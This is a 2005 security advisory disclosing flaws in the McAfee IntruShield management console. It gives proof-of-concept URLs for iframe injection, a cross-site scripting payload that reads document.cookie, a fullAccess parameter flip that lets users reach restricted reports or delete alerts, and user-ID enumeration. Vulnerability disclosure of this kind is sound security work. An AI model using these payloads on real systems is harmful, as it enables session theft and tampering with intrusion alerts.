$ An open security advisory #8 - McAfee Intrushield IPS Management Console Abuse
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com 2: Bug Released: July 06 2005 3: Bug Impact Rate: Medium / Hi 4: Bug Scope Rate: Local / Remote
$ This advisory and/or proof of concept code must not be used for commercial gain.
McAfee IntruShield Security Management System http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm
"The McAfee IntruShield Security Management System is an advanced solution for administering IntruShield sensor appliance deployments. The IntruShield Security Management System (ISM) can support both large and small network intrusion prevention system (IPS) deployments and can scale up to several hundred sensor appliances. By integrating a comprehensive set of Best-in-Class security management functions, the IntruShield Security Management System dramatically simplifies and streamlines the complexities associated with IPS configuration, policy compliance, and threat and response management."
A new version has been released to address these bugs and can be downloaded from their site.
Note: for issues 1 - 4, the attacker needs a valid user account.
1) It is possible to embed HTML into the MISMS. This could potentially allow phishing attacks to be performed against a valid Manager account.
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager& domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager& topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="
http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20width=800%20height=600 > </iframe>&severity=critical&count=1
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager& domainName=Demo&resourceName=<script>alert("There could be trouble ahead")</script><script>alert(document.cookie)
3) It is possible to access the restricted "Generate Reports" section of the MISMS and as such, a non-privileged user can gain important information regarding the configuration and set-up of the IP devices being managed by the Service. This can be achieved by simply changing the Access option from false to true.
4) It is possible to acknowledge, de-acknowledge and delete alerts from the MISMS console by modifying URL's sent to the system by simply changing the Access option from false to true.
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager& domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager& topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity= critical&count=1
Each change is emailed out to the administrator, however the email only says that "someone" made a change.
5) As default, all user ID values are passed in the URL in the clear, meaning that it is trivial for an attacker to brute force accounts until a privileged Manager account is found. An example of this would look similar to:
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif
This process can be continued until a valid user ID has been found with privileges to access the configure screen.